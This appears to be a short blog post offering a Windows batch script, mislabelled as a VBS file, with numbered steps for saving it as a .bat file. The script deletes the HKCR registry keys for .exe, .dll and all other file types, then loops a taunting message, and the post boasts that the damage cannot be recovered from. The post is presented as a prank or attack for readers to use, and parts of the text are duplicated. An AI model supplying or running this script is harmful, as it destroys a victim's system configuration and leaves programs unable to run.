What will this VBS file do ?
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM).
Method :
1. Open Notepad and copy the code given below
2. Save as "Anything.bat" (Without quotes & .bat is must)
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM).
Method :
1. Open Notepad and copy the code given below
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE
2. Save as "Anything.bat" (Without quotes & .bat is must)
0 comments:
Post a Comment